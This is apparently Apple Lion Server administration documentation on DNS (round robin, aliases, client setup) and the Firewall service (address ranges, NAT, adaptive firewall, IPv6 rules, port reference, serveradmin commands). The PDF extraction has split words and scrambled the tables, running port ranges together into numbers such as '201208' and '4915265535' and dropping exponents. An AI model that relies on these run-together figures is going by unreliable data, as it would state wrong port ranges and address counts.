BIND permits simple load distribution using an address -shuffling method known as round rob in. You set up a pool of IP addresses for several hosts mirroring the s ame content, and BIND cycles the order of these address es as it responds to queries. Round robin cant monitor current server load or processing power. It only cycles the order of an address list for a given host name. You enable round robin by adding multiple IP address entries for a given hostname. For example, s uppose you want to distribute web server traffic between three servers on your network that all mirror the same content. The servers have the IP addresses 192.168.12.12, 192.168.12.13, and 192.168.12.14. You would add three machine records with three IP addres ses, each with the same domain name. When DNS s ervice encounters multiple entries for one host, its default behavior is to answer queries by sending this list in a cycled order. The first reques t gets the address es in the order A, B, C. The next request gets the order B, C, A, then C, A, B, and so on. To mitigate the effects of local caching, you might want the zones time-to-live (TTL) number to be fairly short.
DNS
Host serveral Internet services with a single IP address

You can have one server that s upplies all Internet services (such as mail or web). These s ervices can run on one computer with a single IP addres s. You can have multiple host names in the same zone for a single server. For example, you might want to have the domain name www.example.com resolve to the same IP address as ftp.example.com or mail.example.com. This domain appears to be several servers to anyone accessing the s ervices , but they are all one s erver at one IP address . Setting up DNS records for this service is easy: add aliases to the machine DNS record. Setting up DNS names for these services does not enable or configure the s ervices . It provides names that are easy to remember for each service offered. This can simplify setup and configuration of the client software for each service. For example, for every s ervice you want to s how, do the following: Create mail.example.com to enter on mail clients. Be sure to select the mail server checkbox on the machine pane. Create www.example.com to enter on web browsers . Create afp.example.com for Apple File Sharing in the Finder. Create ftp.example.com to enter on FTP clients . As your needs grow, you can add computers to the network to handle thes e services. Then, remove the alias from the machines DNS record and create a record for the new machine, and your clients s ettings can remain the same.
DNS
Host multiple domains on the same server

One server can supply all Internet services (s uch as mail or web) for several domain names . For example, the domain name www.example.com can res olve to the same IP address as www.server.org. This domain appears as servers, but they are all one server at one IP address. Setting up DNS records for this service is easy: add a DNS zone and then add host names and server information to that zone. Setting up DNS names for these s ervices does not enable or configure the service for the domain names. This configuration is used with virtual domain hos ting in mail and web services .
DNS
Configure a client to use your DNS server

You can configure clients to us e a DNS server to convert internet names to IP addresses s o you dont need to know the IP address of a s erver you are trying to reach.
1. Choose Apple > Sys tem Preferences, and then click Network. 2. From the services list, s elect the network connection services you use to connect to the Internet (such as Ethernet). 3. In the DNS Server field, enter the IP address for the primary DNS server you want to use. To enter addresses for several servers enter a comma between addresses. To find out which DNS s erver you s hould be using, check with your network adminis trator. DNS server address es are provided by DHCP service.
DNS
Find more DNS information

For more information about DNS and BIND, s ee the following:
DNS and BIND, 5th edition, by Paul Albitz and Cricket Liu (OReilly and Associates, 2006) The International Software Cons ortium website: www.is c.org and www.isc.org/sw/bind Request for Comments (RFC) documents provide an overview of a protocol or service and explain how the protocol should behave. If youre a novice s erver administrator, youll probably find some of the background information in an RFC helpful. If youre an experienced s erver administrator, you can find technical details about a protocol in its RFC document. You can search for RFC documents by number at http://www.ietf.org/rfc.html. A, PTR, CNAME, MX. (For more information, s ee RFC 1035.) AAAA. (For more information, s ee RFC 1886.)
Firew all serv ice
Understanding firew alls
About Firewall service

Services such as Web and FTP are identified on your server by a TCP or User Datagram Protocol (UDP) port number. When a computer tries to connect to a service, Firewall service s cans the rule list for a matching port number.
When a packet arrives at a network interface and the firewall is enabled, the packet is compared to each rule, starting with the lowest-numbered (highest-priority) rule. When a rule matches the packet, the action specified in the rule (s uch as permit or deny) is taken. Then, depending on the action, more rules can be applied. The rules you set are applied to TCP packets and UDP packets . In addition, you can set up rules for restricting Internet Control Mess age Protocol (ICMP) or Internet Group Management Protocol (IGMP) using advanced rule creation. Important: When you start Firewall s ervice the first time, only ports ess ential to remote administration of the server are open, including s ecure shell (22) and several others. Other ports are dynamically opened to permit specific res ponses to queries initiated from the server. To permit remote access to other s ervices on your computer, open more ports using the Services section of the Settings pane. If you plan to share data over the Internet and you dont have a dedicated router or firewall to protect your data from unauthorized access , us e Firewall service. This service works well for s mall to medium businesses , schools , and small or home offices. Large organizations with a firewall can us e Firewall service to exercise a greater degree of control over their servers . For example, workgroups in a large busines s, or schools in a school system, can use Firewall service to control access to their own servers. Firewall service also provides stateful packet inspection, which determines whether an incoming packet is a legitimate response to an outgoing reques t or part of an ongoing session. This permits packets that would otherwise be denied.
Firew all serv ice
Understanding IP addressing
Unders tanding firewall rules requires unders tanding how IP addressing works. IP address IP address es consist of four segments with values between 0 and 255 (the range of an 8-bit number), separated by dots (for example, 192.168.12.12). The s egments in IP addres ses go from general to specific. For example, the first segment might belong to all computers in a company and the last segment might belong to a specific computer on one floor of a building. Address ranges When you create an address group using Server Admin, you enter an IP addres s and a s ubnet mas k. The three types of address notations permitted are: A single address: 192.168.2.1 A range express ed with CIDR notation: 192.168.2.1/24 A range express ed with netmask notation: 192.168.2.1:255.255.255.0 Server Admin shows the resulting addres s range. You can change the range by changing the subnet mask. When you indicate a range of potential values for any s egment of an address, that s egment is called a wildcard. The following table gives examples of address ranges created to achieve specific goals.
Goal Create a rule that specifies a single IP address. Example IP address 10.221.41.33 Enter this in the address field 10.221.41.33 or 10.221.41.33/32 Address range affected 10.221.41.33 (single address) 10.221.41.33 10.221.41.33/24 10.221.41.0 to 10.221.41.255
Create a rule that leaves the fourth segment as a wildcard. Create a rule that leaves part of the third segment and all of the fourth segment as a wildcard. Create a rule that applies to all incoming addresses.
10.221.41.33
10.221.41.33/22
10.221.40.0 to 10.221.43.255
Select Any
All IP addresses
Multiple IP addresses A server can support multiple homed IP addres ses, but Firewall service applies one set of rules to all s erver IP addresses. If you create multiple alias IP addres ses , the rules you create apply to all of thos e IP address es.
Firew all serv ice
Using address ranges

When you create an address group using Server Admin, you enter an IP addres s and a s ubnet mas k. The three types of addres s notations permitted are: A single address: 192.168.2.1 A range express ed with CIDR notation: 192.168.2.1/24 A range express ed with netmask notation: 192.168.2.1:255.255.255.0 Server Admin shows the resulting addres s range. You can change the range by changing the subnet mask. When you indicate a range of potential values for any s egment of an address, that s egment is called a wildcard. The following table gives examples of address ranges created to achieve specific goals.
Goal Create a rule that specifies a single IP address.
Example IP address 10.221.41.33
Enter this in the address field 10.221.41.33 or 10.221.41.33/32
Address range affected 10.221.41.33 (single address)
Create a rule that leaves the fourth segment as a wildcard. Create a rule that leaves part of the third segment and all of the fourth segment as a wildcard. Create a rule that applies to all incoming addresses.
10.221.41.33
10.221.41.33/24
10.221.41.0 to 10.221.41.255
10.221.41.33
10.221.41.33/22
10.221.40.0 to 10.221.43.255
Select Any
All IP addresses
Firew all serv ice
Using Firewall service with NAT

You mus t enable the firewall to use NAT. Enabling NAT creates a divert rule in the firewall configuration. Although Server Admin permits NAT service and Firewall service to be enabled and dis abled independently, NAT service can operate only if both NAT and Firewall services are enabled. An es sential part of NAT is the packet divert rule us ed in the firewall. The firewall rule you s et up instructs the firewall how to route network traffic coming from the network behind the NAT gateway. When you have a LAN behind a NAT gateway, you must create or know the address group that corresponds to the LAN.
Firew all serv ice
Adaptive firewall
Lion Server us es an adaptive firewall that dynamically generates a firewall rule if a us er or an IP addres s generates 10 consecutive failed login attempts. About the adaptive firewall The adaptive firewall helps to prevent your computer from being attacked by unauthorized us ers. The adaptive firewall does not require configuration and is active when you turn on your firewall. When too many network requests are made of the server in too short a time period, the adaptive firewall creates a temporary rule for ipfw and ip6fw that blocks the network activity. After a s et time period, the temporary firewall rules is removed and ipfw and ip6fw are returned to their normal s et or rules. By default, the generated rule blocks the offending IP address for 15 minutes, preventing access . Although the adaptive firewall automatically engages , an adminis trator can customize the firewall's reaction by: Adding an IP number or address range permanently to a whitelis t Adding an IP number or address range permanently to a blacklis t Changing the blocking time period Changing the adaptive firewall's reporting behavior Adaptive firewall files and utilities The adaptive firewall consists of the following parts:
Utility or file /usr/libexec/afctl /etc/af.plist /System/Library/LaunchDaemons/com.apple.afctl.plist /var/db/af/whitelist Purpose T he executable T he plist format config file for afctl T he launchd plist for afctl T he file used to store the whitelist
/var/db/af/blacklist
T he file used to store the list of blocked addresses
/System/Library/CoreServices/AdaptiveFirewall.bundle/Contents/MacOS/hb_summary A tool that summarizes the host blocking activity of afctl
For more information see the man pages for afctl and hb_summary.
Firew all serv ice
About IPv6 firewall rules

When you configure and us e Firewall service in Server Admin, by default ipfw and ip6fw are started. However, all IPv6 traffic except for local traffic is blocked. You can override the IPv6 rules by using the ip6fw tool, but after Firewall service or the s erver is restarted your rules are overwritten. Using Server Admin, you can control how a firewall manages the IPv6 firewall with the following two keys in the /etc/ipfilter/ip_address_groups .plist file: <key>IPv6Mode</key> <string>DenyAllExceptLocal</string> <key>IPv6Control</key> <true/> The IPv6Mode key allows you to control which IPv6 rules are applied. There are three poss ible s ettings for the IPv6Mode key: DenyAllExceptLocal DenyAll NoRules By default, the IPv6Mode key has the s tring set to DenyAllExceptLocal. This setting applies the following rules, which denies all IPv6 traffic but permits local network traffic: add 1 allow udp from any to any 626 add 1000 allow all from any to any via lo0 add 1100 allow all from any to ff02::/16 65000 deny ipv6 from any to any If you set the IPv6Mode string to DenyAll, only the following rule is applied, blocking all IPv6 traffic. 65000 deny ipv6 from any to any If you set the IPv6Mode string to NoRules, no rules are created for IPv6. If your network is entirely IPv6, you might want to use this rule and use the ip6fw tool to create override rules for IPv6 and create a s cript that reapplies the rules when Firewall service or the server restarts . The IPv6Control key allows you to set a Boolean value that determines if ip6fw starts or stops when ipfw starts or stops . If the value is set to true, ip6fw starts and s tops when ipfw s tart or stops. If the value is set to false, only ipfw s tarts or s tops. By default the value is set to true.
Firew all serv ice
Common network administration tasks that use Firewall service

This section describes common uses of Firewall service in network administration. Your firewall is the first line of defens e against unauthorized network intruders , malicious us ers, and network virus attacks that can harm data or abus e network resources. Controlling or enabling peer-to-peer network usage Sometimes network adminis trators must control the use of Peer-to-Peer (P2P) file sharing applications. Such applications might use network bandwidth and resources improperly or dis proportionately. P2P file sharing might also pose a security or intellectual property ris k for a bus iness .
You can disable P2P networking by blocking incoming and outgoing traffic on the port number used by the P2P application. You must determine the port us ed for each P2P network in ques tion. By default, Lion Servers firewall blocks ports not specifically opened. You can limit P2P network us age to IP address es behind the firewall. To do so, open the P2P port for your LAN interface but continue to block the port on the interface connected to the Internet (the WAN interface). To learn how to make a firewall rule, see Configure advanced firewall rules (CLI) or Configure advanced firewall rules . Controlling or enabling network game usage Sometimes network adminis trators must control the use of network games. The games might us e network bandwidth and resources improperly or disproportionately. You can disable network gaming by blocking traffic incoming and outgoing on the port number used by the game. You must determine the port used for each network game in question. By default, Lion Servers firewall blocks all ports not s pecifically opened. You can limit network game us age to IP address es behind the firewall. To do so, open the relevant port on your LAN interface but continue to block the port on the interface connected to the Internet (the WAN interface). Some games require a connection to a gaming service for play, s o this might not be effective. You can open the firewall to specific games , permitting network games to connect to other players and game services outside the firewall. To do this , open up the relevant port on your LAN and WAN interface. Some games require more than one port to be open. For networking details, consult the games documentation. Blocking Junk Mail This section describes how to reject mail from a junk mail s ender with an IP address of 17.128.100.0 (for example) and accept all other Internet mail. Important: To block incoming SMTP mail, s et up specific address ranges in rules you create. For example, if you set a rule on port 25 to deny mail from all addres ses, you prevent mail from being delivered to users.
Firew all serv ice
Where to find more information

For more information about accessing and implementing the features of ipfw, the tool that controls Firewall service, see the ipfwman page. Request for Comments (RFC) documents provide an overview of a protocol or service and describe how the protocol should behave. If youre a novice s erver administrator, youll probably find the background information in an RFC helpful. If youre an experienced s erver administrator, you can find all technical details about a protocol in its RFC document. The RFC s ection of the following website contains several RFC numbers for various protocols : www.ietf.org/rfc.html. The Internet Ass igned Number Authority (IANA) maintains a list of well known ports and TCP and UDP ports that have been ass igned by the organization for various protocols. The lis t can be found at www.iana.org/as signments /port-numbers. Also, important multicast addres ses are documented in the most recent Assigned Numbers RFC, currently RFC 1700.
Firew all serv ice
TCP and UDP port reference

The following tables s how the TCP and UDP port numbers commonly used by Mac OS X computers and Lion Servers . Use these ports when you set up access rules. To view the RFCs referenced in the tables, s ee www.faqs.org/rfcs. 1499
Port 7 TCP, UDP 20 T CP Description Echo FTP data Reference RFC 792 RFC 959
21 T CP 22 T CP, UDP
FTP control Secure Shell (SSH); Open Directory replica setup
RFC 959
23 T CP, UDP 25 T CP, UDP 53 T CP, UDP 67 UDP 68 UDP 69 UDP 79 T CP, UDP 80 T CP 88 T CP, UDP 106 TCP, UDP 110 TCP, UDP 111 TCP, UDP 113 TCP, UDP 115 TCP 119 TCP 123 TCP, UDP 137 TCP, UDP 138 TCP, UDP 139 TCP 143 TCP 161 UDP 192 UDP 201208 TCP 311 TCP
Telnet Mail: SMTP DNS DHCP server (BootP), NetBoot server DHCP client Trivial File Transfer Protocol (T FTP) Finger HTTPweb Kerberos V5 KDC Open Directory Password Server (with 3659) Mail: POP3 Remote Procedure Call (RPC) Authentication service Simple File Transfer Protocol (SFT P) Network News Transfer Protocol (NNTP) Network Time Protocol Windows Name Service (WINS) Windows NETBIOS browsing Windows file and print service (SMB/CIFS) Mail: IMAP Simple Network Management Protocol (SNMP) AirPort administration AppleTalk Server Admin over SSL, AppleShare IP remote web administration, Server Monitor, Server Admin (servermgrd), Workgroup Manager (DirectoryService)
RFC 854 RFC 821 RFC 1034
RFC 1288 RFC 2068 RFC 1510
RFC 1081 RFC 1057 RFC 931
RFC 977 RFC 1305
RFC 100 RFC 2060
389 TCP 407 TCP, UDP 427 TCP, UDP 443 TCP 445 TCP 465 TCP 497 TCP, UDP
LDAP (directory) Timbuktu SLP (Service Location Protocol) HTTPSsecure web over SSL Microsoft Domain Server Mail: SMTP Dantz Retrospect
RFC 2251
5003999
Port 500 UDP Description VPN ISAKMP/IKE Reference
513 UDP 514 TCP 514 UDP 515 TCP 532 TCP 548 TCP 554 TCP, UDP 587 TCP 591 TCP 6001023 TCP, UDP 625 TCP 626 UDP
Who Shell, syslog Syslog LPR print spooling NetNews AFP (Apple Filing Protocol) QTSS RTSP streaming Mail: SMTP submission FileMaker web access Mac OS X RPC-based services Remote Directory Access Serial number support for Snow Leopard Server and earlier RFC 2326 RFC 1179
631 TCP, UDP 636 TCP 660 TCP 687 TCP 749 TCP, UDP
IPP printer sharing LDAP over SSL Server administration using Server Settings Server administration using Server Admin Kerberos administration and changepw using the kadmind command-line tool
985 TCP 993 TCP 995 TCP, UDP 1099, 8043 TCP 1220 TCP 1694 TCP 1701 UDP 1723 TCP 2000 TCP 2049 TCP, UDP 2336 TCP 2399 TCP 3004 TCP 3031 TCP, UDP 3283 TCP, UDP 3306 TCP 3632 TCP 3659 TCP, UDP 3689 TCP 3690 TCP
NetInfo static port Mail: IMAP over SSL Mail: POP3 over SSL Remote RMI and RMI/IIOP access to JBoss QTSS administration IP Failover VPN L2TP VPN PPTP Mail: Custom filtering (sieve) Network File System (NFS) Mobile account sync FileMaker data access layer iSync Program Linking, remote AppleEvents Apple Remote Desktop (with 5900) MySQL XCode distributed compiler Open Directory Password Server (with 106) iT unes music sharing Subversion version control RFC 2637
400050999
Port 4111 TCP 4500 UDP 5003 TCP, UDP 5060 UDP 5100 TCP 5190 TCP UDP Description Xgrid VPN IKE NAT traversal FileMaker name binding and transport iChat session initiation Camera and scanner sharing iChat, AOL Instant Messenger, and iChat file transfer 5222 TCP 5223 TCP 5269 TCP 5297 UDP 5298 TCP, UDP 5678 UDP 5353 UDP 5432 TCP 5900 TCP, UDP iChat Server (Jabber/XMPP) iChat Server (Jabber/XMPP) over SSL iChat Server to server (Jabber/XMPP) iChat local subnet iChat local subnet iChat AV behind NAT Multicast DNS (Bonjour, mDNSResponder) Apple Remote Desktop 2.0 database VNC (Mac OS X screen sharing, Apple Remote Desktop 2.0) 5988, 5989 TCP 69706999 UDP 7070 TCP, UDP Apple Remote Desktop 2.0 CIM/OpenWBEM QTSS RTP streaming QTSS RTSP Automatic Router Configuration Protocol (ARCP) 7777 TCP 80008999 TCP 80008001 TCP 8005 TCP 8008, 8443 TCP 8080 TCP iChat Serverfile transfer proxy Web service QTSS MP3 streaming Tomcat remote shutdown iCal Server and iCal Server SSL HTTPweb service alternative (Apache 2 default) 8088 TCP 8080, 8443, 9006 TCP 8800, 8843 TCP Software Update server Tomcat standalone and JBoss Address Book Server and Address Book Server SSL 9007 TCP 1638416403 UDP 4200042999 TCP 4915265535 TCP 50003 T CP, UDP Tomcat remote web server access to AIP port iChat audio/video RTP and RT CP iT unes radio streams FTP service PASV port range FileMaker Server service (Windows) or daemon (Mac OS X) Reference
50006 T CP, UDP
FileMaker Server Helper service (Windows) or
daemon (Mac OS)
AZ by service
Port 548 TCP 192 UDP 3283 TCP, UDP 5988, 5989 TCP 5432 TCP 201208 TCP 113 TCP, UDP 5100 TCP 497 TCP, UDP 68 UDP 67 UDP 53 T CP, UDP 7 TCP, UDP 2399 TCP 5003 TCP, UDP 50006 T CP, UDP 50003 T CP, UDP 591 TCP 79 T CP, UDP 21 T CP 20 T CP 4915265535 TCP 443 TCP 80 T CP 8080 TCP 1638416403 UDP 5678 UDP 5297 UDP 5298 TCP, UDP 5222 TCP 5223 TCP 5269 TCP 7777 TCP 5060 UDP 5190 TCP UDP Serv ice AFP (Apple Filing Protocol) AirPort administration Apple Remote Desktop (with 5900) Apple Remote Desktop 2.0 CIM/OpenWBEM Apple Remote Desktop 2.0 database AppleTalk Authentication service Camera and scanner sharing Dantz Retrospect DHCP client DHCP server (BootP), NetBoot server DNS Echo FileMaker data access layer FileMaker name binding and transport FileMaker Server Helper service (Windows) or daemon (Mac OS) FileMaker Server service (Windows) or daemon (Mac OS X) FileMaker web access Finger FTP control FTP data FTP service PASV port range HTTPSsecure web over SSL HTTPweb HTTPweb service alternative (Apache 2 default) iChat audio/video RTP and RT CP iChat AV behind NAT iChat local subnet iChat local subnet iChat Server (Jabber/XMPP) iChat Server (Jabber/XMPP) over SSL iChat Server to server (Jabber/XMPP) iChat Serverfile transfer proxy iChat session initiation iChat, AOL Instant Messenger, and iChat file transfer
1694 TCP 631 TCP, UDP 3004 TCP 3689 TCP 4200042999 TCP 749 TCP, UDP
IP failover IPP printer sharing iSync iTunes music sharing iTunes radio streams Kerberos administration and changepw using the kadmind command-line tool
88 T CP, UDP 389 TCP 636 TCP 515 TCP 6001023 TCP, UDP 2000 TCP 143 TCP 993 TCP 110 TCP, UDP 995 TCP, UDP 25 T CP, UDP 587 TCP 445 TCP 2336 TCP 5353 UDP 3306 TCP 985 TCP 532 TCP 2049 TCP, UDP 119 TCP 123 TCP, UDP 3659 TCP, UDP 106 TCP, UDP 3031 TCP, UDP 1220 TCP 80008001 TCP 69706999 UDP 7070 TCP, UDP 554 TCP, UDP 625 TCP 111 TCP, UDP 1099, 8043 TCP
Kerberos V5 KDC LDAP (directory) LDAP over SSL LPR print spooling Mac OS X RPC-based services Mail: Custom filtering (sieve) Mail: IMAP Mail: IMAP over SSL Mail: POP3) Mail: POP3 over SSL Mail: SMTP Mail: SMTP submission Microsoft Domain Server Mobile account sync Multicast DNS (Bonjour, mDNSResponder) MySQL NetInfo static port NetNews Network File System (NFS) Network News Transfer Protocol (NNTP) Network T ime Protocol Open Directory Password Server (with 106) Open Directory Password Server (with 3659) Program linking, remote AppleEvents QTSS administration QTSS MP3 streaming QTSS RT P streaming QTSS RT SP Automatic Router Configuration Protocol (ARCP) QTSS RT SP streaming Remote directory access Remote procedure call (RPC) Remote RMI and RMI/IIOP access to JBoss
22 T CP, UDP 626 UDP 311 TCP
Secure shell (SSH) Serial number support for Snow Leopard Server Server Admin over SSL, AppleShare IP remote web administration, Server Monitor, Server Admin (servermgrd), Workgroup Manager (DirectoryService)
687 TCP 660 TCP 514 TCP 115 TCP 161 UDP 427 TCP, UDP 8088 TCP 3690 TCP 514 UDP 23 T CP, UDP 407 TCP, UDP 8005 TCP 9007 TCP 8080, 8443, 9006 TCP 69 UDP 5900 TCP, UDP 4500 UDP 500 UDP 1701 UDP 1723 TCP 80008999 TCP 513 UDP 139 TCP 137 TCP, UDP 138 TCP, UDP 3632 TCP 4111 TCP
Server administration using Server Admin Server administration using Server Settings Shell, syslog Simple File Transfer Protocol (SFT P) Simple Network Management Protocol (SNMP) SLP (Service Location Protocol) Software Update server Subversion version control Syslog T elnet T imbuktu T omcat remote shutdown T omcat remote web server access to AIP port T omcat standalone and JBoss T rivial File Transfer Protocol (TFTP) VNC (Mac OS X screen sharing, Apple Remote Desktop 2.0) VPN IKE NAT traversal VPN ISAKMP/IKE VPN L2TP VPN PPTP Web service Who Windows file and print service (SMB/CIFS) Windows Name Service (WINS) Windows NETBIOS browsing XCode distributed compiler Xgrid
Firew all serv ice
Rule mechanism and precedence

The rules in the Firewall Settings Services pane operate with the rules shown in the Advanced pane. Usually, the broad rules in the Advanced pane block access for all ports. Thes e are lower-priority (higher-numbered) rules and are applied after the rules in the Services pane. The rules created with the Services pane open access to specific s ervices and are higher priority. They take precedence over those created in the Advanced pane.
If you create multiple rules in the Advanced pane, the precedence for a rule is determined by the rule number. This number corresponds to the order of the rule in the Advanced pane. Rules can be reordered by dragging them in the list in the Firewall Settings Advanced pane. For most normal us es, opening access to designated s ervices in the Advanced pane is sufficient. If necessary, add more rules using the Advanced pane.
Firew all serv ice
About the subnet mask

A subnet mask indicates the segments in the s pecified IP address that can vary on a network and by how much. The s ubnet mas k is given in Classles s InterDomain Routing (CIDR) notation. It cons is ts of the IP addres s followed by a slash (/) and a number from 1 to 32, called the IP prefix. An IP prefix identifies the number of significant bits used to identify a network. For example, 192.168.2.1/16 means that the first 16 bits (the first two s ets of numbers separated by periods) are us ed to represent the network (so every machine on the network begins with 192.168) and the remaining 16 bits (the last two numbers separated by periods) are used to identify hosts . Each machine has a unique set of trailing numbers . Subnet masks can be given in another notation, which is the IP addres s followed by a colon (:) and the netmask. A netmask is a group of 4 numbers , each from 0 to 255, separated by periods equivalent to the slash in CIDR notation. Addresses with subnet masks in CIDR notation correspond to address notation subnet masks.
CIDR /1 /2 /3 /4 /5 /6 /7 /8 /9 /10 /11 /12 /13 /14 /15 /16 /17 /18 /19 /20 /21 Corresponds to netmask 128.0.0.0 192.0.0.0 224.0.0.0 240.0.0.0 248.0.0.0 252.0.0.0 254.0.0.0 255.0.0.0 255.128.0.0 255.192.0.0 255.224.0.0 255.240.0.0 255.248.0.0 255.252.0.0 255.254.0.0 255.255.0.0 255.255.128.0 255.255.192.0 255.255.224.0 255.255.240.0 255.255.248.0 Number of addresses in the range 4.29x10 2.14x10 1.07x10 5.36x10 1.34x10 6.71x10 3.35x10 1.67x10 8.38x10 4.19x10 2.09x10 1.04x10 5.24x10 2.62x10 1.31x10 65536 32768 16384 8192 4096 2048
9
/22 /23 /24 /25 /26 /27 /28 /29 /30 /31 /32
255.255.252.0 255.255.254.0 255.255.255.0 255.255.255.128 255.255.255.192 255.255.255.224 255.255.255.240 255.255.255.248 255.255.255.252 255.255.255.254 255.255.255.255
1024 512 256 128 64 32 16 8 4 2 1
Firew all serv ice
Setting up firew alls
Firewall setup overview

After you decide the types of rules to configure, use the following steps to set up Firewall service. Step 1: Learn and plan If youre new to working with Firewall s ervice, learn and understand firewall concepts, tools , and features of Lion Server. Then determine which services to provide access to. Mail, Web, and FTP s ervices generally require access from computers on the Internet. File and Print s ervices are more likely to be restricted to your local s ubnet. After you decide the services to protect using Firewall service, determine the IP addresses you want to acces s your server and the IP address es you want to deny. Then configure the s uitable rules . Step 2: Turn Firewall service on In Server Admin, s elect Firewall and click Start Firewall. By default, this blocks all incoming ports except those used to configure the server remotely. If youre configuring the s erver locally, turn off external access immediately. Important: If you add or change a rule after starting Firewall service, the new rule affects connections established with the server. For example, if you deny acces s to your FTP server after starting Firewall s ervice, computers connected to your FTP server are disconnected. Step 3: Configure firewall address groups settings Create an IP addres s group that the firewall rules apply to. By default, an IP address group is created for all incoming IP addresses . Rules applied to this group affect all incoming network traffic. Step 4: Configure firewall service settings Activate s ervice rules for each address group. In the Services pane, you can activate rules based on address groups as des tination IP numbers . Step 5: Configure firewall logging settings Use logging settings to enable Firewall service event logging. You can als o set what types and how many packets get logged. Step 6: Configure firewall advanced settings Configure advanced firewall rules to further configure other services, strengthen network security, and fine-tune your network traffic through the firewall. By default, UDP traffic is blocked, except traffic arriving in respons e to an outgoing query. Apply rules to UDP ports sparingly, if at all, becaus e denying some UDP respons es could inhibit normal networking operations. If you configure rules for UDP ports, dont select Log all allowed packets in the Firewall Logging settings pane in Server Admin. Because UDP is a connectionless protocol, every packet to a UDP port is logged if you select this option.
Step 7: Turn Firewall service on You turn Firewall service on us ing Server Admin. Important: If you add or change a rule after starting Firewall service, the new rule affects connections established with the server. For example, if you deny all access to your FTP server after starting Firewall service, computers connected to your FTP server are disconnected.
Firew all serv ice
About firewall rules

What a firewall rule is A firewall rule is a set of characteristics for an IP packet, coupled with an action to be taken for each packet that matches the characteris tics . The characteristics might include the protocol, source or destination address, source or destination port, or network interface. Addresses might be express ed as a single IP address or might include a range of addres ses . A service port might be expressed as a single value, a list of values, or a range of values. The IP address and s ubnet mas k determine the range of IP address es the rule applies to, and can be set to apply to all addresses . Basic firewall practices By default, Lion Server us es a simple model for a us eful, secure firewall. If a firewall is too restrictive, the network behind it can be too is olated. If a firewall is too permissive, it fails to s ecure the as sets behind it. Adhering to the following aspects of the basic model provides maximum flexibility and utility with minimum risk: Permit ess ential IP activity. Essential IP activity includes those network activities necessary to us e IP and function in an IP environment. These activities include operations such as loopback and are express ed as high-priority (low-numbered) rules, visible in the Advanced pane of Firewall service settings. Thes e rules are configured for you. Permit service-s pecific activity. Service-s pecific activity refers to network packets destined for s pecific service ports , such as web or mail s ervices. By permitting traffic to access ports with designated, configured services, you permit access through the firewall on a per-service bas is . These services are expressed as medium-priority rules and correspond to check boxes in the Service pane of Firewall settings. You make these changes based on your settings and address groups. Deny packets not already permitted. This is the final catch-all practice. If a packet or traffic to a port is unsolicited, the packet or traffic is dis carded and not permitted to reach its destination. This is expres sed as low-priority (high-numbered) rules, visible in the Advanced pane of Firewall service s ettings. A basic set of deny rules for the firewall is created by default.
Firew all serv ice
Start Firewall service (CLI)

You can us e serveradmin to start the s ervice. Before you turn on Firewall service, make sure youve set up rules permitting acces s from IP address es you choose; otherwise, no one can acces s your server. By default, Firewall service blocks incoming TCP connections and denies UDP packets, except those received in response to outgoing reques ts from the s erver. If you add or change a rule after starting Firewall service, the new rule affects connections es tablished with the s erver. For example, if you deny all access to your FTP server after starting Firewall service, computers connected to your FTP s erver are disconnected.
sudo serveradmin start ipfilter
Firew all serv ice
Start Firewall service

You can us e Server Admin to s tart the service. Before you turn on Firewall service, make sure youve set up rules permitting acces s from IP address es you choose; otherwise, no one can acces s your server. By default, Firewall service blocks incoming TCP connections and denies UDP packets, except those received in response to outgoing reques ts from the s erver. If you add or change a rule after starting Firewall service, the new rule affects connections es tablished with the s erver. For example, if you deny all access to your FTP server after starting Firewall service, computers connected to your FTP s erver are disconnected.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Below the Servers list, click the Start Firewall button.
Firew all serv ice
Stop Firewall service (CLI)

You use serveradmin to s top Firewall service.
sudo serveradmin stop ipfilter
Firew all serv ice
Stop Firewall service

You use Server Admin to stop Firewall s ervice.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Stop Firewall. 5. Click Stop Now.
Firew all serv ice
Enable firewall administration

Before you can configure firewall s ettings, you must turn Firewall service on in Server Admin.
2. Click Settings. 3. Click Services. 4. Select the Firewall checkbox. 5. Click Save.
Firew all serv ice
Configuring firew alls
Configure advanced firewall rules (CLI)

You use the Advanced Settings pane in Server Admin to configure specific rules for Firewall service. Firewall rules contain originating and des tination IP addresses with subnet masks. They als o s pecify what to do with incoming network traffic. You can apply a rule to all IP addres ses, a specific IP address, or a range of IP addres ses . Addresses can be listed as individual addres ses (192.168.2.2), IP addres s and subnet mask in CIDR notation (192.168.2.0/24), or IP address and s ubnet mas k in netmask notation (192.168.2.0:255.255.255.0).
Parameter rule Description A unique rule number. T he standard rule settings described under Firewall command-line parameters.
Other parameters
Add a rule: $ sudo serveradmin settings ipfilter:rules:_array_id:rule= create ipfilter:rules:_array_id:rule:source = source ipfilter:rules:_array_id:rule:protocol = protocol ipfilter:rules:_array_id:rule:destination = destination ipfilter:rules:_array_id:rule:action = action ipfilter:rules:_array_id:rule:enableLocked = (yes|no) ipfilter:rules:_array_id:rule:enabled = (yes|no) ipfilter:rules:_array_id:rule:log = (yes|no) ipfilter:rules:_array_id:rule:readOnly = (yes|no) ipfilter:rules:_array_id:rule:source-port = port Control-D
Firew all serv ice
Configure advanced firewall rules

You use the Advanced Settings pane in Server Admin to configure specific rules for Firewall service. Firewall rules contain originating and des tination IP addresses with subnet masks. They als o s pecify what to do with incoming network traffic. You can apply a rule to all IP addres ses, a specific IP address, or a range of IP addres ses . Addresses can be listed as individual addres ses (192.168.2.2), IP addres s and subnet mask in CIDR notation (192.168.2.0/24), or IP address and s ubnet mas k in netmask notation (192.168.2.0:255.255.255.0).
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Advanced.
